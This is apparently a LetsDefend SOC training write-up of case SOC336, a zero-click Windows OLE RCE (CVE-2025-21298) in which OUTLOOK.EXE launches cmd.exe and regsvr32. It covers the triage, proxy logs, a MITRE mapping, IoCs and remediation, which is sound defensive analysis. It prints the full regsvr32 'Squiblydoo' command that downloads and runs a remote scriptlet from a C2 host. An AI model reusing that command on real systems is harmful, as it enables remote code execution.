SOC336 - Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025-21298)

16/05/2026 — CRITICAL — LetsDefend SOC - Endpoint & Proxy Logs (172.16.17.137)

True Positive #cve-2025-21298#windows-ole#zero-click#rce#regsvr32#phishing#c2

Detection and investigation of a confirmed Windows OLE zero-click RCE exploitation via a malicious RTF email. OUTLOOK.EXE spawned cmd.exe which executed regsvr32.exe to retrieve a remote payload from a C2 server. The proxy permitted the outbound request. Host was isolated and escalated to L2.

Case and process

Case ID
SOC336
Analyst
Alain Tran (L1)
Reviewer
TBD (L2)
Escalated to
Yes — escalated to L2 for forensic investigation after host isolation.

Severity rationale

Critical: confirmed zero-click RCE exploitation of CVE-2025-21298 (CVSS 9.8). A malicious RTF email triggered OUTLOOK.EXE to spawn cmd.exe, which executed regsvr32.exe to silently retrieve and run a remote scriptlet (shell.sct) from C2 server 84.38.130.118. The proxy permitted the outbound GET request. Payload was successfully retrieved. No AV/EDR quarantine occurred. Full execution chain confirmed via process tree and proxy logs.

Remediation

  • Isolated host 172.16.17.137 via EDR immediately after C2 connection confirmed. Done
  • Blocked C2 IP 84.38.130.118 at proxy level. Done
  • Submitted IoCs (IP, URL, file) to Threat Intel team. Done
  • Apply Microsoft January 2025 patch for CVE-2025-21298 across all endpoints. Pending
  • Create SIEM detection rule alerting on OUTLOOK.EXE spawning cmd.exe or powershell.exe. Pending
  • Block regsvr32.exe outbound connections via Attack Surface Reduction (ASR) rules. Pending
  • Disable automatic RTF preview in Outlook via Group Policy. Pending

Overview

On February 4, 2025, at 08:06 AM, a SOC alert was triggered for a suspected exploitation of CVE-2025-21298, a critical zero-click Remote Code Execution vulnerability in the Windows OLE component (CVSS 9.8).

The vulnerability allows an attacker to achieve code execution simply by sending a malicious RTF email — the victim does not need to open an attachment. Outlook’s automatic preview is enough to trigger the exploit.

Investigation Steps

1. Initial triage

The alert identified OUTLOOK.EXE as the parent process of a suspicious execution chain on host 172.16.17.137. The binary path was confirmed legitimate:

C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE

2. Process tree analysis

OUTLOOK.EXE spawned cmd.exe with the following command:

cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll

This is a known Squiblydoo / Living-off-the-Land technique (MITRE T1218.010). regsvr32.exe is a legitimate Windows binary abused here to download and execute a remote COM scriptlet (.sct) without writing to disk initially, bypassing many AV solutions.

3. Network log analysis

Proxy logs confirmed the outbound connection:

FieldValue
Source172.16.17.137:35424
Destination84.38.130.118:80
MethodGET
URLhttp://84.38.130.118.com/shell.sct
Proxy actionPermitted
Processcmd.exe (PID 6784)
TimestampFeb 04, 2025, 08:06 AM

The proxy did not block the request. The payload shell.sct was successfully retrieved from the C2 server.

4. Quarantine check

Neither the antivirus nor the EDR automatically quarantined the malware. The payload executed without being intercepted.

Malware quarantined: No

5. Verdict

True Positive — Exploitation confirmed. The full execution chain from email delivery to C2 payload retrieval was validated via process tree and proxy logs.

MITRE ATT&CK Mapping

Technique IDName
T1566.001Phishing — Spearphishing Attachment
T1218.010System Binary Proxy Execution — Regsvr32
T1071.001Application Layer Protocol — Web Protocols (C2 over HTTP)

Indicators of Compromise (IoCs)

TypeValue
C2 IP84.38.130.118
Payload URLhttp://84.38.130.118.com/shell.sct
Payload fileshell.sct
Abused binaryregsvr32.exe
Affected host172.16.17.137
Affected processOUTLOOK.EXEcmd.exe (PID 6784)

Key Takeaways